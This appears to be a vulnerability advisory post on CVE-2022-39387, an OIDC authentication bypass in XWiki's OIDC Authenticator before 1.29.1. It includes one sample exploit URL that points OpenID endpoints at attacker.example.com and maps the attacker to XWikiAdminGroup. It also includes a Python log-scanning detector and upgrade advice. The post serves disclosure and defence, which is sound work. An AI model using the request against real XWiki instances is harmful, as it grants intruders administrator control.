The XWiki OIDC Authenticator is an extension of XWiki, a popular open-source web application for creating and managing wikis. It implements the OpenID Connect protocol in XWiki, allowing integration with any OpenID Provider. However, a serious vulnerability has been discovered in the XWiki OIDC Authenticator prior to version 1.29.1, which allows authentication bypass and arbitrary group assignment. This post discusses the details of the issue and provides guidance on how to mitigate it.

Exploit Details

CVE-2022-39387 is an authentication bypass vulnerability in the XWiki OIDC Authenticator. In versions prior to 1.29.1, even if a wiki has an OpenID provider configured in its xwiki.properties file, an attacker can still supply the details of a third-party provider through request parameters during the authentication process.

By specifying their own provider through the "oidc.endpoint.*" request parameters, or by using an XWiki-based OpenID provider with "oidc.xwikiprovider", an attacker can effectively bypass the XWiki authentication altogether. Moreover, by providing a specific group mapping through "oidc.groups.mapping" in the request, the attacker's user will automatically become part of the XWikiAdminGroup, granting them admin privileges.

The following request illustrates the issue:

https://vulnerable.xwiki.instance.com/?oidc.endpoint.authorization=http://attacker.example.com/auth/endpoint
&oidc.endpoint.token=http://attacker.example.com/token/endpoint
&oidc.endpoint.userinfo=http://attacker.example.com/userinfo/endpoint
&oidc.groups.mapping=%7BXWiki.XWikiAdminGroup=attacker_group%7D
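Because the vulnerable versions honour OIDC provider and group-mapping settings passed in the query string, the presence of those parameters in web server access logs is a useful indicator for finding attempts against instances that were not yet upgraded. The following detection helper is an added example written for this post, not code from XWiki or the OIDC Authenticator project. It assumes a Common Log Format access log (the regex and the sample lines are constructed for illustration; hostnames use the reserved .invalid domain) and flags any request that carries oidc.endpoint.*, oidc.xwikiprovider or oidc.groups.mapping parameters, the three parameter families named above.

```python
"""Detection helper for CVE-2022-39387 probing (added example, not XWiki code).

Flags HTTP requests whose query string carries OIDC configuration parameters
(oidc.endpoint.*, oidc.xwikiprovider, oidc.groups.mapping) that the vulnerable
XWiki OIDC Authenticator (< 1.29.1) accepted from the request itself.
The log format and sample lines below are constructed for illustration.
"""
import re
from typing import Iterable, List, Tuple
from urllib.parse import parse_qsl, urlsplit

# Parameter families the advisory names as accepted from the request.
SUSPICIOUS_PREFIXES = ("oidc.endpoint.",)
SUSPICIOUS_EXACT = {"oidc.xwikiprovider", "oidc.groups.mapping"}

# Minimal Common Log Format matcher (assumption: client IP, two ident fields,
# bracketed timestamp, quoted request line, three-digit status).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)


def suspicious_oidc_params(target: str) -> List[str]:
    """Return the OIDC override parameter names present in a request target.

    parse_qsl percent-decodes the query, so encoded braces or slashes in the
    values do not hide the parameter names.
    """
    query = urlsplit(target).query
    hits = []
    for key, _value in parse_qsl(query, keep_blank_values=True):
        if key in SUSPICIOUS_EXACT or key.startswith(SUSPICIOUS_PREFIXES):
            hits.append(key)
    return hits


def scan_access_log(lines: Iterable[str]) -> List[Tuple[str, str, str, List[str]]]:
    """Return (ip, timestamp, target, params) for every request carrying OIDC overrides."""
    findings = []
    for line in lines:
        match = LOG_RE.match(line)
        if not match:
            continue  # not in the expected format; skip rather than guess
        hits = suspicious_oidc_params(match.group("target"))
        if hits:
            findings.append((match.group("ip"), match.group("ts"), match.group("target"), hits))
    return findings


# Constructed sample log: one request overriding endpoints and group mapping,
# one ordinary page view, and one request pointing at an XWiki-based provider.
SAMPLE_LOG = [
    '203.0.113.5 - - [04/Nov/2022:19:20:01 +0000] "GET /xwiki/bin/view/Main/'
    '?oidc.endpoint.authorization=https%3A%2F%2Fidp.example.invalid%2Fauth'
    '&oidc.groups.mapping=%7BXWiki.XWikiAdminGroup%3Dattacker_group%7D HTTP/1.1" 302 0',
    '198.51.100.7 - - [04/Nov/2022:19:21:13 +0000] "GET /xwiki/bin/view/Main/ HTTP/1.1" 200 5120',
    '192.0.2.9 - - [04/Nov/2022:19:22:40 +0000] "GET /xwiki/bin/view/Main/'
    '?oidc.xwikiprovider=https%3A%2F%2Fwiki.example.invalid HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    for ip, ts, target, params in scan_access_log(SAMPLE_LOG):
        print(f"{ts} {ip} {target} -> {', '.join(params)}")
```

Running the script lists the first and third sample requests and the parameters that triggered the match. On an instance where the provider is fixed in xwiki.properties these parameters have no reason to appear in ordinary traffic, so each hit should be correlated with the user session created shortly afterwards and with group membership changes on XWikiAdminGroup; after the upgrade to 1.29.1 the same query is still worth keeping as an indicator of probing.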

Original References

- XWiki OIDC Authenticator: https://extensions.xwiki.org/xwiki/bin/view/Extension/OIDC/OpenID%20Connect%20Authenticator%20Application/
- XWiki CVE-2022-39387 Patch: https://jira.xwiki.org/browse/OAUTH-321
- XWiki OIDC Authenticator 1.29.1 Release Notes: https://extensions.xwiki.org/xwiki/bin/view/Extension/OIDC/OpenID%20Connect%20Authenticator%20Application%20Release%20Notes%201.29.1/

Upgrade and No Workaround

The only reliable way to address CVE-2022-39387 at this time is to upgrade the XWiki OIDC Authenticator to version 1.29.1. There is no workaround to this issue, and upgrading the authenticator is required to prevent potential unauthorized access and granting of admin privileges to a malicious actor with knowledge of the exploit.

You can download the XWiki OIDC Authenticator version 1.29.1 from the following link: https://extensions.xwiki.org/xwiki/bin/view/Extension/OIDC/OpenID%20Connect%20Authenticator%20Application/

Conclusion

CVE-2022-39387 is a critical vulnerability that allows an attacker to bypass authentication by supplying their own OpenID provider (or an XWiki-based one) through request parameters, and to assign arbitrary groups, including XWikiAdminGroup, to their user. To protect your XWiki instances, it is highly recommended that you upgrade the XWiki OIDC Authenticator to version 1.29.1 as soon as possible. Always be proactive in applying security updates and stay informed about the latest patches for the software you run.

Timeline

Published on: 11/04/2022 19:15:00 UTC
Last modified on: 11/07/2022 19:12:00 UTC